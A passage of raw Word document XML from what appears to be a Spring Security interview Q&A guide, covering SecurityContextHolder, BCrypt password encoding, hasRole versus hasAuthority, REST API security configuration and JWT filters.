          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>htt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srf</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isable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28D2E1" w14:textId="3AE351CF" w:rsidR="00C93D1E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C93D1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FD3C96E">
          <v:rect id="_x0000_i2149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DC3053" w14:textId="5E153D83" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00E347A0" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="_Toc196307945"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of SecurityContextHolder</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="6A369486" w14:textId="25FCBA7A" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00836555" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It holds the SecurityContext, which contains the authenticated user's Authentication object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0391E7" w14:textId="77777777" w:rsidR="004A02AD" w:rsidRPr="00CE4B95" w:rsidRDefault="004A02AD" w:rsidP="004A02AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB59B32" w14:textId="44200469" w:rsidR="005F52D5" w:rsidRPr="00CE4B95" w:rsidRDefault="005F52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8531629"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> auth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ecurityContextHold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Contex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Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AECD79C" w14:textId="7429CC08" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C2A">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FE01F9F">
          <v:rect id="_x0000_i2150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1849F8" w14:textId="6B0B94CE" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00603252" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc196307946"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is password encryption handled in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w14:paraId="6DDAA82D" w14:textId="16114E73" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00603252" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Use PasswordEncoder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3A74F" w14:textId="77777777" w:rsidR="003F5783" w:rsidRPr="00CE4B95" w:rsidRDefault="003F57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308615"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E664BA7" w14:textId="77777777" w:rsidR="003F5783" w:rsidRPr="00CE4B95" w:rsidRDefault="003F57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308615"/>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asswordEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> passwordEncod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5712A38" w14:textId="77777777" w:rsidR="003F5783" w:rsidRPr="00CE4B95" w:rsidRDefault="003F57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30861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BCryptPasswordEncoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25422A0D" w14:textId="557A81D9" w:rsidR="003F5783" w:rsidRPr="00CE4B95" w:rsidRDefault="003F57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308615"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872B490" w14:textId="06040B64" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C2A">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66118DF">
          <v:rect id="_x0000_i2151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63860001" w14:textId="0B164601" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc196307947"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between hasRole() and hasAuthority()</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p w14:paraId="26BB24C5" w14:textId="504287CA" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C2A" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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85"/>
        <w:gridCol w:w="2958"/>
        <w:gridCol w:w="3009"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w14:paraId="1C61DC19" w14:textId="77777777" w:rsidTr="001C0E1E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A938C1B" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1E">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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0972DE6C" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1E">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Role Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16CB9D65" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1E">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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w14:paraId="20234FAD" w14:textId="77777777" w:rsidTr="001C0E1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71456B98" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1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Role("USER")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F3D8F1F" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1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utomatically adds ROLE_ prefix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A85720" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1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ole should be ROLE_USER in DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w14:paraId="3FF698D5" w14:textId="77777777" w:rsidTr="001C0E1E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B46CA7" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1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Authority("ROLE_USER")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B8FD1C" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1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plicit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54D30F16" w14:textId="77777777" w:rsidR="001C0E1E" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0E1E" w:rsidP="001C0E1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re flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F7668D3" w14:textId="1A386DBF" w:rsidR="00D40DC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D40DC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2CC146C">
          <v:rect id="_x0000_i2152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D27ADF" w14:textId="0859E3BC" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03652" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="_Toc196307948"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you secure REST APIs using Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w14:paraId="2A96E796" w14:textId="538CF449" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03652" w:rsidP="00C03652">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61255B64" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03652">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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JWT or Basic Auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB87659" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03652">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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isable CSRF for stateless APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE52FD4" w14:textId="1D1C320A" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03652">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B98BC" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A523B82" w14:textId="77777777" w:rsidR="001672C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>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srf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F6DB7" w14:textId="64AB920D" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="001672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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C03652" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C03652" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>disable</w:t>
      </w:r>
      <w:r w:rsidR="00C03652" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700E469" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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uthorizeRequests</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784795AA" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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ntMatchers</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pi/admi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hasRol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DMIN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D458EF8" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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nyReques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uthenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208AB5CF" w14:textId="77777777" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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nd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F29BB8" w14:textId="6498FD9D" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03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httpBasi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or JWT filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF87CB" w14:textId="591D0624" w:rsidR="00C03652" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C0365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A87DC58">
          <v:rect id="_x0000_i2153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="224FD9EA" w14:textId="57FF3897" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001F3B1B" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc196307949"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement JWT in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="6C67A8D7" w14:textId="151259E6" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C2A" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703C703A" w14:textId="77777777" w:rsidR="001F3B1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001F3B1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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rcept requests with a custom OncePerRequestFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20C2C2" w14:textId="77777777" w:rsidR="001F3B1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001F3B1B">
      <w:pPr>
